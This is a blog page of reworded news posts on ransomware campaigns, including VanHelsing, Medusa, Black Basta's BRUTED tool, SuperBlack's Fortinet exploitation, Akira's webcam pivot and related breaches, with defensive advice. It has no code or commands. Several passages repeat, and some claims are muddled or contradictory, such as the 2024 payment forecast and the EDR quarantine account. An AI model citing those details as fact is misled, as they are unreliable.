Search This Blog
Powered by Blogger.

Blog Archive

Labels

About Me

Load More
Trendy Right Now

Popular Posts

Showing posts with label Ransomware. Show all posts
VanHelsing
AR CyberCrime CyberThreat ESXi Platforms Google Window malware Ransomware VanHelsing

VanHelsing Ransomware Strikes Windows ARM and ESXi Platforms

 


As part of an ongoing analysis of ransomware-as-a-service operations, a new operation known as VanHelsing has been identified. This operation demonstrates a sophisticated multi-platform capability, posing a significant cybersecurity threat. This new strain of ransomware is designed to be able to compromise a wide range of systems, including Windows, Linux, BSD, ARM and ESXi, highlighting how adaptable and powerful the malware is.

During the spring of 2025, VanHelsing became highly visible in underground cybercriminal forums, where it was actively promoted to potential affiliates. The most significant aspect of the program was the fact that experienced cybercriminals were given free access, while those with less expertise were required to pay a $5,000 deposit as a condition to participate. In this case, the targeted recruitment strategy seems to be a calculated one to attract both seasoned and aspiring threat actors to expand the scope of the ransomware's operational capabilities. 

A few weeks back, cybersecurity firm CYFIRMA first revealed the existence of VanHelsing, providing insight into its emergence and early stages. The findings of Check Point Research's extensive technical analysis, published yesterday in the journal Security Research, provide a more in-depth understanding of the ransomware's mechanics as well as its operational framework, which was published following this discovery. It has become apparent that VanHelsingRaaS is spreading rapidly, raising serious concerns among cybersecurity professionals. 

Just two weeks after the ransomware launched, three confirmed victims of the ransomware have been successfully compromised. This virus has already gone through further development and has already been redeveloped into a more advanced version. The speed at which it has developed highlights how powerful it could become within the cyber threat landscape, and it warrants security professionals around the world to be vigilant and take proactive measures to combat it. 

While the ransomware is still evolving, multiple infections have already been detected, which indicates that it has been deploying rapidly in real-world attacks. To investigate several variants, which have so far been restricted to the Windows platform, cybersecurity researchers have conducted an in-depth examination. All of these variants have been identified as being based on Windows. A notable aspect of the malware is that it has been improved incrementally with each subsequent iteration, which suggests that the malware is constantly being improved. 

It is clear from the frequent updates and rapid progress of the ransomware that the developers are committed to expanding their capabilities, and this raises concerns regarding its potential impact as the ransomware matures. According to the available evidence, VanHelsing ransomware was first found in the wild on March 16, when the ransomware was first detected in the wild. To secure the files within this malware, a 32-byte (256-bit) symmetric key and a 12-byte nonce are generated for each file by the ChaCha20 encryption algorithm. 

In addition, VanHelsing also encrypts these generated values with the use of an embedded Curve25519 public key to further enhance its encryption processes. These encrypted keys and nonces are then embedded in the affected file to make them more secure. A notable feature of VanHelsing is its extensive command-line interface (CLI) customization that enables attackers to tailor the attack to meet the specific requirements of their target users. 

Files that exceed 1GB in size are subjected to partial encryption, while smaller files are subjected to complete encryption. As part of this method, drives and folders will be selected, encryption parameters will be set, the attack will spread via SMB protocol, shadow copy deletions will be bypassed, and evasion will be performed in a dual-phase stealth mode. VanHelsing utilizes two types of encryption to provide high levels of security. 

It is a standardized encryption technique in which it systematically enumerates directories, encrypts file content, and then renames the affected files using the ".vanhelsing" extension. On the other hand, when in stealth mode, both the encryption and file renaming are performed in separate processes, thus minimizing detection risks since the encryption process mimics normal file input/output (I/O) activity to minimize detection risk.

During the renaming phase of the data, security tools might detect anomalies, but by that time the data is already encrypted in full. However, Check Point has identified several shortcomings in its code development that have been attributed to immature development despite its advanced functionality and rapid evolution. There are many reasons for this, including inconsistency in file extensions, flaws in exclusion list logic that could lead to duplicate encryption cycles, and several command-line flags that have not been implemented yet. 

Despite VanHelsing's many technical imperfections, it remains a formidable emerging cyber threat. Considering that it is a continuously evolving threat, security professionals and organizations must keep their eyes open for potential threats associated with this ransomware variant as it is developing. In recent years, van Helsing ransomware has emerged as an extremely sophisticated cyber threat that can be used against multiple platforms, including Windows, Linux, BSD, ARM, and ESXi, and is rapidly evolving. 

With its advanced encryption techniques, extensive CLI customization, and stealth tactics, this ransomware can be a formidable weapon in the hands of cybercriminals. There is strong evidence that the ransomware is actively spread through underground forums, as well as its recruitment strategy. Security researchers have noted that it is rapidly iterating and improving, making proactive defence measures imperative. 

Although VanHelsing may have been developed with technical flaws, it remains an incredibly dangerous threat due to its ability to spread rapidly and adapt quickly. Organizations must maintain an effective cybersecurity strategy, stay informed about emerging threats, and enhance their defences to avoid potential risks. The evolving nature of this ransomware emphasizes the need.
Read more »
Vulnerabilities
Artificial Intelligence ChatGPT cybercriminals Cybersecurity Ransomware Vulnerabilities

Cybercriminals Exploit Psychological Vulnerabilities in Ransomware Campaigns

 


During the decade of 2025, the cybersecurity landscape has drastically changed, with ransomware from a once isolated incident to a full-sized global crisis. No longer confined to isolated incidents, these attacks are now posing a tremendous threat to economies, governments, and public services across the globe. There is a wide range of organizations across all sectors that find themselves exposed to increasingly sophisticated cyber threats, ranging from multinational corporations to hospitals to schools. It is reported in Cohesity’s Global Cyber Resilience Report that 69% of organizations have paid ransom demands to their suppliers in the past year, which indicates just how much pressure businesses have to deal with when such attacks happen. 

The staggering number of cybercrime cases highlights the need for stronger cybersecurity measures, proactive threat mitigation strategies and a heightened focus on digital resilience. With cybercriminals continuously improving their tactics, organizations need to develop innovative security frameworks, increase their threat intelligence capabilities, and foster a culture of cyber vigilance to be able to combat this growing threat. The cybersecurity landscape in 2025 has changed significantly, as ransomware has evolved into a global crisis of unprecedented proportions. 

The threat of these attacks is not just limited to isolated incidents but has become a significant threat to governments, industries, and essential public services. Across the board, companies of all sizes are increasingly vulnerable to cyber threats, from multinational corporations to hospitals and schools. In the last year, Cohesity released its Global Cyber Resilience Report, which revealed that 69% of organizations paid ransom demands, indicating the immense pressure that businesses face in the wake of such threats. 

This staggering figure underscores how urgent it is that we take more aggressive cybersecurity measures, develop proactive threat mitigation strategies, and increase our emphasis on digital resilience to prevent cyberattacks from taking place. Organizations must embrace new security frameworks, strengthen threat intelligence capabilities, and cultivate a culture of cyber vigilance to combat this growing threat as cybercriminals continue to refine their tactics. A persistent cybersecurity threat for decades, ransomware remains one of the biggest threats today. 

However, the first global ransom payment exceeded $1 billion in 2023, marking a milestone that hasn't been achieved in many years. Cyber extortion increased dramatically at this time, as cyber attackers constantly refined their tactics to maximize the financial gains that they could garner from their victims. The trend of cybercriminals developing increasingly sophisticated methods and exploiting vulnerabilities, as well as forcing organizations into compliance, has been on the rise for several years. However, recent data indicates a significant shift in this direction. It is believed that in 2024, ransomware payments will decrease by a substantial 35%, mainly due to successful law enforcement operations and the improvement of cyber hygiene globally.

As a result of enhanced security measures, increased awareness, and a stronger collective resistance, victims of ransom attacks have become increasingly confident they can refuse ransom demands. However, cybercriminals are quick to adapt, altering their strategies quickly to counteract these evolving defences to stay on top of the game. A response from them has been to increase their negotiation tactics, negotiating more quickly with victims, while simultaneously developing stealthier and more evasive ransomware strains to be more stealthy and evasive. 

Organizations are striving to strengthen their resilience, but the ongoing battle between cybersecurity professionals and cybercriminals continues to shape the future of digital security. There has been a new era in ransomware attacks, characterized by cybercriminals leveraging artificial intelligence in increasingly sophisticated manners to carry out these attacks. Using freely available AI-powered chatbots, malicious code is being generated, convincing phishing emails are being sent, and even deepfake videos are being created to entice individuals to divulge sensitive information or transfer funds by manipulating them into divulging sensitive information. 

By making the barriers to entry much lower for cyber-attacking, even the least experienced threat actors are more likely to be able to launch highly effective cyber-attacks. Nevertheless, artificial intelligence is not being used only by attackers to commit crimes. There have been several cases where victims have attempted to craft the perfect response to a ransom negotiation using artificial intelligence-driven tools like ChatGPT, according to Sygnia's ransomware negotiation teams. 

The limitations of AI become evident in high-stakes interactions with cybercriminals, even though they can be useful in many areas. According to Cristal, Sygnia’s CEO, artificial intelligence lacks the emotional intelligence and nuance needed to successfully navigate these sensitive conversations. It has been observed that sometimes artificial intelligence-generated responses may unintentionally escalate a dispute by violating critical negotiation principles, such as not using negative language or refusing to pay outright.

It is clear from this that human expertise is crucial when it comes to managing cyber extortion scenarios, where psychological insight and strategic communication play a vital role in reducing the potential for damage. Earlier this year, the United Kingdom proposed banning ransomware payments, a move aimed at deterring cybercriminals by making critical industries less appealing targets for cybercriminals. This proposed legislation would affect all public sector agencies, schools, local councils, and data centres, as well as critical national infrastructure. 

By reducing the financial incentive for attackers, officials hope to decrease both the frequency and severity of ransomware incidents across the country to curb the number of ransomware incidents. However, the problem extends beyond the UK. In addition to the sanctions issued by the Office of Foreign Assets Control, several ransomware groups that have links to Russia and North Korea have already been sanctioned. This has made it illegal for American businesses and individuals to pay ransoms to these organizations. 

Even though ransomware is restricted in this manner, experts warn that outright bans are not a simple or universal solution to the problem. As cybersecurity specialists Segal and Cristal point out, such bans remain uncertain in their effectiveness, since it has been shown that attacks fluctuate in response to policy changes, according to the experts. Even though some cybercriminals may be deterred by such policies, other cybercriminals may escalate their tactics, reverting to more aggressive threats or increasing their personal extortion tactics. 

The Sygnia negotiation team continues to support the notion that ransom payments should be banned within government sectors because some ransomware groups are driven by geopolitical agendas, and these goals will be unaffected by payment restrictions. Even so, the Sygnia negotiation team believes that government institutions should not be able to make ransom payments because they are better able to handle financial losses than private companies. 

Governments can afford a strong stance against paying ransoms, as Segal pointed out, however for businesses, especially small and micro-sized businesses, the consequences can be devastating if they fail to do so. It was noted in its policy proposal that the Home Office acknowledges this disparity, noting that smaller companies, often lacking ransomware insurance or access to recovery services, can have difficulty recovering from operational disruptions and reputational damage when they suffer from ransomware attacks. 

Some companies could find it more difficult to resolve ransomware demands if they experience a prolonged cyberattack. This might lead to them opting for alternative, less transparent methods of doing so. This can include covert payment of ransoms through third parties or cryptocurrencies, allowing hackers to receive money anonymously and avoid legal consequences. The risks associated with such actions, however, are considerable. If they are discovered, businesses can be subjected to government fines on top of the ransom, which can further worsen their financial situation. 

Additionally, full compliance with the ban requires reporting incidents to authorities, which can pose a significant administrative burden to small businesses, especially those that are less accustomed to dealing with technology. Businesses are facing many challenges in the wake of a ransomware ban, which is why experts believe a comprehensive approach is needed to support them in the aftermath of this ban.

Sygnia's Senior Vice President of Global Cyber Services, Amir Becker, stressed the importance of implementing strategic measures to mitigate the unintended consequences of any ransom payment ban. It has been suggested that exemptions for critical infrastructure and the healthcare industries should be granted, since refusing to pay a ransom may lead to dire consequences, such as loss of life. Further, the government should offer incentives for organizations to strengthen their cybersecurity frameworks and response strategies by creating incentives like these.

A comprehensive financial and technical assistance program would be required to assist affected businesses in recovering without resorting to ransom payments. To address the growing ransomware threat effectively without disproportionately damaging small businesses and the broader economy, governments must adopt a balanced approach that entails enforcing stricter regulations while at the same time providing businesses with the resources they need to withstand cyberattacks.
Read more »
Ransomware
Cyber Security Cybersecurity Hacking Medusa Ransomware

Authorities Warn Against Medusa Ransomware Surge

 

 
Federal agencies are urging individuals and organizations to stay vigilant against a rising ransomware threat that has affected hundreds of new victims in recent weeks. The FBI, Cybersecurity and Infrastructure Security Agency (CISA), and Multi-State Information Sharing and Analysis Center (MS-ISAC) have jointly issued an advisory detailing the tactics used by Medusa ransomware and how to mitigate its impact.

First identified in June 2021, Medusa is a ransomware-as-a-service (RaaS) variant that primarily targets critical infrastructure sectors, including healthcare, education, legal, insurance, technology, and manufacturing. Through the RaaS model, the ransomware's developers delegate attack execution to affiliates, who have collectively compromised over 300 victims in the past month alone.

Initially, Medusa operated as a closed ransomware variant, where the same group that developed the malware also carried out attacks. However, it has since evolved into an affiliate-driven model, with developers recruiting attackers from dark web forums and paying them between $100 to $1 million per job.

Cybercriminals behind Medusa employ two primary attack vectors:
  • Phishing campaigns – Fraudulent emails trick users into downloading malicious attachments or clicking harmful links.
  • Exploiting unpatched vulnerabilities – Attackers take advantage of outdated software to infiltrate company networks.

Once inside, they utilize various legitimate tools to expand their access:

  • Advanced IP Scanner and SoftPerfect Network Scanner – Used to detect exploitable network vulnerabilities.
  • PowerShell and Windows command prompt – Help compile lists of targeted network resources.
  • Remote access tools like AnyDesk, Atera, and Splashtop – Assist in lateral movement across the system.
  • PsExec – Enables execution of files and commands with system-level privileges.
To avoid detection, attackers often disable security tools using compromised or signed drivers. They also delete PowerShell history and leverage Certutil to conceal their activity.

Similar to other ransomware strains, Medusa follows a double-extortion strategy. Not only do attackers encrypt stolen data, but they also threaten to leak it publicly if the ransom is not paid. Victims typically have 48 hours to respond, after which they may be contacted via phone or email.

A Medusa data leak site displays ransom demands along with a countdown timer. If victims need more time, they can delay the data release by paying $10,000 in cryptocurrency per extra day. Meanwhile, attackers may attempt to sell the stolen data to third parties even before the timer expires.

Federal authorities recommend the following preventative measures to reduce the risk of Medusa attacks:
  • Patch vulnerabilities – Keep all operating systems, software, and firmware updated.
  • Network segmentation – Prevent attackers from moving across connected systems.
  • Traffic filtering – Restrict access to internal services from untrusted sources.
  • Disable unused ports – Close unnecessary entry points to minimize security risks.
  • Backup critical data – Store multiple copies of important files in an isolated location.
  • Enable multifactor authentication (MFA) – Secure all accounts, especially those used for webmail, VPNs, and critical systems.
  • Monitor network activity – Use security tools to detect unusual patterns and alert administrators to potential threats.
By implementing these strategies, organizations can significantly lower their chances of falling victim to Medusa ransomware and other evolving cyber threats.
Read more »
Ransomware
Black Basta Cyber Security Password Ransomware

Black Basta Hackers Use New Tool to Break Weak Passwords on Remote Systems

 



A cybercriminal group called Black Basta has built a new tool that helps them break into remote systems like VPNs and firewalls by guessing weak passwords. This tool allows them to easily target companies and demand ransom.

According to cybersecurity experts, the tool— named BRUTED, automatically scans the internet to find systems that might be easy to hack. It focuses on popular VPN and firewall services from companies like Cisco, Fortinet, Palo Alto, and others. It also attacks systems used for remote desktop access.

The tool gathers information like IP addresses, website subdomains, and security certificates to help guess passwords specific to each organization. It then sends fake login requests that look like they’re from a real user or device, making it harder to detect.

Since BRUTED runs automatically, it helps hackers attack many targets quickly. This increases their chances of breaking in and earning money from ransomware attacks.

Experts warn that many companies still rely on simple or repeated passwords, which makes their systems easy to hack. Sometimes, attackers use leaked or default passwords that organizations forget to change.

This poor password management exposes businesses to big risks. In fact, weak passwords might have also caused a leak in Black Basta’s own data when a hacker broke into a Russian bank and exposed the gang’s private chats.

Black Basta is known for targeting important industries like healthcare and manufacturing, where even a small disruption can cause major losses. These industries are more likely to pay ransom to avoid shutdowns.

Security experts are urging businesses to act fast—use strong and unique passwords, change default settings, run regular security checks, and train employees about password safety.

Good password habits can help prevent such attacks and protect important systems from hackers like Black Basta.


Read more »
VPN breach
Black Basta Cyber Attacks Cyber Network CyberCrime Cyberhackers CyberThreat Password Ransomware VPN breach

Ransomware Hackers Develop Advanced Tool for VPN Breaches

 


In the Black Basta ransomware group, an automated brute force attack tool referred to as BRUTED has been developed to target and compromise edge networking devices such as firewalls and VPNs, as well as other edge networking devices. By using this sophisticated tool, they can efficiently breach vulnerable internet-facing endpoints, making them able to scale ransomware attacks considerably better than ever before. 

A researcher at EclecticIQ identified the presence of BRUTED when she analyzed internal chat logs related to the ransomware gang, and she found that BRUTED exists. These logs were used to reveal insight into the tool's deployment and revealed that Black Basta has been employing BRUTED to conduct credential-stuffing and brute-force attacks since 2023 against a variety of remote access software programs. This cyber threat has been targeting a wide variety of systems, including SonicWall NetExtender, Palo Alto GlobalProtect, and Citrix NetScaler, highlighting the broad scope of the threat. 

It is Black Basta's intention to improve its operational efficiency by automating brute-force attacks, which in turn allows it to exploit critical infrastructure security vulnerabilities more systematically. As a result of the discovery of BRUTED, organizations relying on internet-connected security solutions are at an even higher risk of cybercrime, as the evolving tactics and sophistication of ransomware groups are becoming more complex. 

The Black Basta ransomware operation has developed an automated brute-force framework known as BRUTED, which has been designed specifically to compromise edge networking devices, such as firewalls and virtual private network access points. As a result of this advanced framework, the group can gain early access to targeted networks, which facilitates large-scale ransomware attacks on vulnerable, internet-connected endpoints, which will lead to a successful attack. 

A recently published study by Arda Büyükkaya, a cyber threat intelligence analyst at EclecticIQ, confirms that the Black Basta ransomware group is using a previously unidentified brute-force framework for stealing data. Known as BRUTED, this framework is specifically crafted to automate the process of compromising enterprise VPNs and firewalls, thus enhancing the group's ability to gain unauthorized access to corporate networks, which is significantly enhanced. 

Multiple reports have emerged throughout 2024 detailing the extensive use of brute-force attacks against these devices and password spray. It is still unclear how these incidents are linked to BRUTED or other threat actor operations, although the issue is still under investigation. This tool has been developed to highlight the increasing sophistication of ransomware tactics and the increasing risk organizations face when relying on internet-connected security infrastructure as part of their security measures. 

A thorough analysis of Büyükkaya's source code has proven that the tool's primary function consists of snooping across the internet and credential stuffing attacks, to attack edge network devices. It has been widely used within corporate environments to implement firewalls and VPN solutions. By its log-naming conventions, BRUTED is referred to as the bruised tool, and researchers at EclecticIQ have concluded that it is used by Black Basta to perform large-scale credential-stuffing attacks. This group gains an initial foothold by exploiting weak or reused credentials, which allows them to move from compromised networks to other compromised ones, and ultimately install ransomware. 

It is also BRUTED's responsibility to assist affiliates, who are responsible for performing initial access operations in ransomware campaigns, as well as to enhance the group's operational efficiency. As the framework automates and scales attacks, it can widen the victim pool and accelerate the monetization process, thus increasing the efficiency of ransomware operations. As a result of this discovery, cybercriminals have become increasingly sophisticated in their tactics, which highlights the need for robust security measures to protect against them. 

Arda Büyükkaya explained that the BRUTED framework will enable Black Basta affiliates to automate and scale their attacks to significantly increase the number of victims they can target, as well as boost their monetization efforts to continue operating ransomware. As a result of the emergence of this brute-forcing tool, edge devices are demonstrating their ongoing vulnerability, especially in light of persistent warnings from private cybersecurity firms and government agencies regarding increased threats targeting VPN services. Even though these advisories have been issued, it remains a lucrative attack vector for cybercriminals to hack passwords for firewalls and virtual private networks (VPNs). 

According to the Qualys team, a blog post a while back highlighted the fact that Black Basta has been using default VPN credentials, brute force techniques involving stolen credentials, and other forms of access to gain initial access to their systems. In this report, the manager of vulnerability research at Qualys Threat Research Unit and a co-author of the report asserted that weak passwords for VPNs and other services that are open to the public continue to pose a significant security risk to organizations. 

Furthermore, Abbasi emphasized that several leaked Black Basta chat logs contained simple or predictable credentials, demonstrating the persistent vulnerabilities that threat actors exploit to infiltrate corporate networks. By implementing the BRUTED framework, threat actors can streamline their ransomware operations, as it enables them to infiltrate multiple networks at the same time with as little effort as possible.

As a result of this automation, cybercriminals have access to greater monetization opportunities, which allows them to scale their attacks more efficiently. The risks posed by such tools must be mitigated by the adoption of strong cybersecurity practices. To protect against these risks, organizations must enforce unique passwords for all edge devices and VPNs. Further, multi-factor authentication (MFA) is an essential component of any security system because it adds another layer of protection that prevents unauthorized access, even when credentials are compromised. To identify potential threats, continuous network monitoring is also crucial. 

Security teams should keep an eye on authentication attempts coming from unfamiliar locations and flag high volumes of failures to log in as an indicator of brute force attacks. Several measures can be implemented to reduce the effectiveness of credential-stuffing techniques, such as rate-limiting measures and account-locking policies. As a result of the growing threat of BRUTED, EclecticIQ has provided a list of IP addresses and domains associated with the framework to the public in response. 

Indicators such as these can be used to update firewall rules so that requests from known malicious infrastructure will be blocked effectively while limiting the tool's reach. BRUTED does not exploit software vulnerabilities to gain access to network edge devices, but maintaining up-to-date security patches remains an important part of cybersecurity. Regularly applying the latest patches ensures that potential vulnerabilities in the network security systems are addressed, thus strengthening the overall resilience of the network security systems.
Read more »
Software
Cyber Security LockBit Ransomware Software

New Ransomware 'SuperBlack' Abuses Fortinet Firewall Flaws to Launch Attacks

 


A newly discovered ransomware group known as Mora_001 is carrying out cyberattacks by exploiting security weaknesses found in Fortinet's firewall systems. The group is using a custom ransomware strain named SuperBlack to target organizations and lock their data for ransom.

The attackers are taking advantage of two security loopholes that allow them to bypass login protections on Fortinet devices. These issues, listed as CVE-2024-55591 and CVE-2025-24472, were made public by Fortinet earlier this year. Reports indicate that one of these vulnerabilities had been secretly exploited by attackers even before the company officially disclosed it.

Initially, Fortinet clarified that only one of the two bugs had been misused. However, a recent investigation suggests that the second vulnerability was also being exploited during the same period. Researchers from cybersecurity firm Forescout uncovered this while examining attacks that occurred in January and February 2025.


Step-by-Step Breakdown of the Attack

The cybercriminals begin their attack by finding exposed Fortinet firewall devices that haven’t been updated. They then use these security flaws to gain full control over the system.

Once inside, the attackers grant themselves the highest level of access, commonly known as 'super admin' rights. They either use web-based tools or direct network requests to make these changes.

After securing control, they create new administrator profiles with names like forticloud-tech, fortigate-firewall, or adnimistrator. These fake accounts are set up in a way that even if someone deletes them, automated tasks will recreate them instantly.

The hackers then scan the network to understand its layout and start moving from one system to another. They use stolen login details, create new VPN accounts, and rely on common tools like WMIC and SSH to spread across connected machines. They also try to break into systems that use security checks like TACACS+ or RADIUS.

Before locking files, the group copies important data using their own tools. Their main targets include file storage systems, database servers, and computers that control user access across networks. Once the data is stolen, the ransomware is triggered, encrypting files and leaving ransom messages behind.

To make it harder for experts to investigate the attack later, the hackers run a program called ‘WipeBlack’. This tool removes all traces of the ransomware from the system, leaving very little evidence.


Possible Links to a Bigger Ransomware Group

During their investigation, Forescout found that SuperBlack ransomware shares several similarities with the well-known LockBit ransomware group. The coding style and methods used appear to have been copied from LockBit’s earlier leaked tools.

However, it looks like SuperBlack is being operated separately and is not officially part of the LockBit group.

This incident is a reminder of the risks that come with outdated software. Organizations using Fortinet firewalls should install security updates immediately to avoid falling victim to such attacks. Staying updated is crucial in protecting sensitive information from advanced ransomware threats.



Read more »
Stolen Data
Cyberattack Cybersecurity Data Breach health data medical records Personal Information Ransomware Social Security Stolen Data

Sunflower and CCA Suffer Data Breaches, Exposing Hundreds of Thousands of Records

 

Sunflower recently disclosed a cyberattack on its systems, revealing that hackers gained access on December 15 but remained undetected until January 7. 

During this time, sensitive personal and medical data — including names, addresses, dates of birth, Social Security numbers, driver’s license details, medical records, and health insurance information—were compromised. According to its filing with the Maine Attorney General’s Office, the breach impacted 220,968 individuals.

Meanwhile, CCA experienced a similar data breach in July last year. The organization reported that cybercriminals stole extensive patient information, including names, addresses, dates of birth, driver's license numbers, Social Security numbers, diagnoses, lab results, prescriptions, patient ID numbers, and provider details. The breach affected 114,945 individuals, as per its filing with Maine’s Attorney General’s Office.

The Rhysida ransomware group has claimed possession of 7.6TB of Sunflower’s data, including a 3TB SQL database, according to The Register. With the data still listed online, it suggests that either negotiations are ongoing or have collapsed. However, as of now, there is no confirmed evidence of the stolen data being misused on the dark web.

Following these incidents, both organizations have taken steps to strengthen cybersecurity measures to prevent future breaches.
Read more »
third-party risk
business disruption Cyber Attacks Cyber Insurance Cybersecurity Data Breach Ransomware third-party risk

Cyberattacks on Key Vendors Trigger Widespread Disruptions Across Industries

Cybercriminals are increasingly targeting a single point of failure within companies to create large-scale disruption, according to a recent report by Resilience. The analysis highlights how such attacks can have a ripple effect across entire industries.

In 2024, the global average cost of a data breach was estimated at nearly $4.9 million, based on IBM research. However, certain incidents proved to be significantly more damaging.

One of the most costly breaches occurred when UnitedHealth reported a staggering $3.1 billion expenditure in response to a cyberattack on its Change Healthcare subsidiary. This division processes billions of medical claims annually, and the ransomware attack led to prolonged disruptions in the healthcare sector.

“It was the most significant and consequential cyberattack in the history of U.S. health care,” said John Riggi, national advisor for cybersecurity and risk at the American Hospital Association, in a blog post.

Another major incident targeted CDK Global, a software provider for car dealerships across the U.S. The ransomware attack caused financial damages exceeding $1 billion collectively, as estimated by Anderson Economic Group.

The cyberattacks on Change Healthcare and CDK Global exemplify how disruptions in interconnected organizations can have widespread industry consequences, Resilience noted in its report.

According to Resilience’s analysis, third-party risks have become a leading factor in cyber insurance claims, representing 31% of claims filed by its clients in 2024. While a slightly higher percentage (37%) of third-party claims was recorded in 2023, none resulted in material financial losses.

The study also revealed that ransomware attacks targeting vendors have become a “new and significant” contributor to insurance claims, accounting for 18% of such cases.

Although ransomware remained the primary cause of cyber losses in 2024—responsible for 62% of claims—its overall occurrence may be declining. Resilience attributes this trend to cybercriminals shifting focus toward larger, high-profile organizations that offer bigger financial payouts, moving away from the traditional “spray and prey” strategy.
Read more »
Windows
Akira CyberCrime Cybersecurity Cyberthreats EDR EDR Protections Ransomware S-RM Technology Webcam Windows

Webcam Exploited by Ransomware Group to Circumvent EDR Protections

 


Researchers at S-RM have discovered an unusual attack method used by the Akira ransomware gang. The Akira ransomware gang utilized an unsecured webcam to conduct encryption attacks against victims' networks via the use of an unsecured webcam. The attackers were able to bypass the Endpoint Detection and Response (EDR) mechanisms, which had been successful in stopping the ransomware encryptor from functioning on Windows computers.

During an investigation conducted by the S-RM team as part of an incident response, the S-RM team uncovered Akira's sophisticated adaptations in response to security defences. As a first step, the threat actors tried to implement encryption tools on Windows endpoints, but these attempts were thwarted by the EDR solution provided by the victim. 

It is important to note that the attackers reacted to this by exploiting the unsecured webcam as an entry point for the malware to infiltrate the network and launch their ransomware attacks. This incident illustrates how ransomware operators are increasingly using unconventional vulnerabilities to circumvent modern cybersecurity defenses, highlighting the evolution of ransomware operations. 

Network vulnerabilities exploited by Akira ransomware operators. 


Researchers in the cybersecurity field recently discovered a sophisticated attack strategy that was employed by the Akira ransomware group. Initially, the threat actors gained access to the network via an externally exposed remote access solution through which unauthorized access was gained. The attackers then installed AnyDesk.exe, a legitimate remote desktop tool, to maintain persistent access within the compromised network, and proceeded to exfiltrate sensitive data using this tool. 

In the months following the initial breach, the attackers used Remote Desktop Protocol (RDP) to move laterally through the network, simulating legitimate system administrator activities to conceal their activity and blend into normal networking operations. They evaded detection by mimicking legitimate system administrator activities. 

Akira Ransomware Group: A Rising Threat in the Cybercrime Landscape 


Emergence and Rapid Expansion 


Originally identified in early 2023, the Akira ransomware group has rapidly gained popularity as one of the most active ransomware operations in the world. As of 2024, the Akira group is responsible for around 15% of all ransomware incidents that were examined by cybersecurity firm S-RM. The company specializes in targeting small to medium sized businesses (SMEs) in North America, Europe, and Australia, especially businesses that have fewer than 1,000 employees as their primary target market. 

Operational Model and Organizational Structure 


Rather than using the typical paid-for model, Akira also uses a ransomware-as-a-service model: within this model, the group's core developers provide a running platform that allows its affiliates to access its binary and leak sites in exchange for a share of the ransom payments received by the group's owners. 

Triple Extortion Strategy and Technical Adaptability 


By employing a triple approach of extortion, or a series of layers of coercion to maximize leverage over their victims, Akira achieves extreme leverage over them: 

Data Encryption – Locking files and systems to disrupt business operations. 

Data Exfiltration – Stealing sensitive information before encryption. 

Public Disclosure Threats – Threatening to release exfiltrated data unless the ransom is paid. 

Akira's technical adaptability is exemplified by its ability to adjust its attack methods based on security threats. A recent webcam attack highlighted the group's innovative tactics. In this case, the group circumvented Endpoint Detection and Response (EDR) protections by using unsecured Internet of Things devices as an alternative entry point to bypass the system's protections. 

As ransomware operations such as Akira become more sophisticated, organizations, particularly small and medium-sized enterprises, must take proactive cybersecurity measures to mitigate the threats posed by these highly adaptive threat actors. To mitigate these risks, organizations must implement robust endpoint security, network segmentation, and IoT security protocols. 

Initially, the threat actors managed to breach the corporate network through an exposed remote access solution, likely using stolen credentials or brute-force techniques to gain access to the network. Once inside, they deployed AnyDesk, an authentic remote access tool, to gain persistent access and gain access to sensitive data. The data was then used as leverage in a double extortion scheme that later resulted in a double extortion attack. 

When the attack was first initiated, the attackers took advantage of the Remote Desktop Protocol (RDP) to enable them to move laterally, systematically spreading their presence across multiple systems before launching the ransomware attack. Their attack was carried out by introducing a password-protected archive file, win.zip, with the ransomware payload, win.exe, as a payload. Although the threat was initially detected and quarantined by the victim's Endpoint Detection and Response (EDR) system, it was ultimately neutralized when the virus was identified and quarantined. 

The attackers modified their strategy after experiencing this setback by finding alternative ways to attack the device. During a thorough network scan, several potential entry points were discovered, including a webcam and a fingerprint scanner. S-RM, a cybersecurity firm, explains that threat actors eventually chose the webcam as their primary pivot point for gaining access to its data, as it is easy for remote shell access and unauthorized video feeds. Moreover, the attackers took advantage of the device's lightweight Linux-based operating system, which was compatible with Akira's Linux encryptor. 

Since the webcam was without a protection agent against EDR attacks, it was an ideal choice for the ransomware attack to take place. The threat actors were able to successfully encrypt files on network shares by leveraging their connectivity to the Internet, circumventing conventional security measures and demonstrating the evolving sophistication of ransomware tactics. Instead of abandoning their original objective, the ransomware operators chose to utilize a previous internal network scan data as the basis for their next strategy. 

An investigation of the Internet of Things (IoT) revealed that several vulnerable devices were not adequately protected, including webcams and fingerprint scanners. As the attackers recognized the potential of unprotected devices as alternative entry points to traditional security systems, they sought to bypass those mechanisms. They discovered several vulnerabilities during their assessment, including an unsecured webcam, which proved to be the most feasible vulnerability. 

Several reasons contributed to this, most notably that it lacked Endpoint Detection and Response (EDR) protection, which made it an ideal target for exploiting. Additionally, the device was capable of being accessed remotely through a remote shell, making it even easier for attackers to gain access.

In addition, the Linux-based operating system presented a lightweight security footprint, which reduced the chances of detection and strengthened the appeal of the operating system as a potential entry point for cybercriminals. Execution of the Attack Through IoT Exploitation This attacker was able to create malicious SMB traffic directed towards a target Windows server by compromising a vulnerable webcam, which was able to be used by the attacker to create malicious SMB traffic. 

Due to the organization's lack of active monitoring of IoT devices, this technique enabled the ransomware payload to bypass traditional detection mechanisms. As a result of the attack, a large number of files were encrypted across the network of the victim. Even though SMB-based attacks have generally been considered to be less efficient than other intrusion techniques, this attack proved extremely effective in this case, mainly because they are frequently incompatible with conventional security monitoring tools, such as this tool. 

It is as a consequence of this incident that organizations must take proactive steps to ensure that all network-connected devices, most notably IoT endpoints, are secured via encryption so that sophisticated ransomware operators are not able to exploit them as attack vectors. 

The fact that the compromised webcam lacked an Endpoint Detection and Response (EDR) protection was a critical factor in the success of this attack, as largely due to its limited storage capacity, it could not cope with advanced security measures needed to defend itself. 

The Akira ransomware group exploited this vulnerability to deploy its Linux-based ransomware quickly from the compromised machine, encrypting files across the victim's network by using the Server Message Block protocol (SMB). As a result of this strategic approach, the attackers were able to operate covertly since malicious SMB traffic originating from the webcam was not detected by security systems, allowing them to evade detection by the organization's cybersecurity team. 

In light of these events, it is due to the growing necessity for comprehensive security protocols, in particular for securing Internet of Things (IoT) devices, that are more and more exploited as attack vectors by cyber criminals. A proactive cybersecurity approach is imperative to mitigate similar threats by ensuring that IoT devices are patched and managed, conducting regular vulnerability assessments within the organization's internal networks, and implementing robust network segmentation so that connected devices are limited in their ability to communicate. 

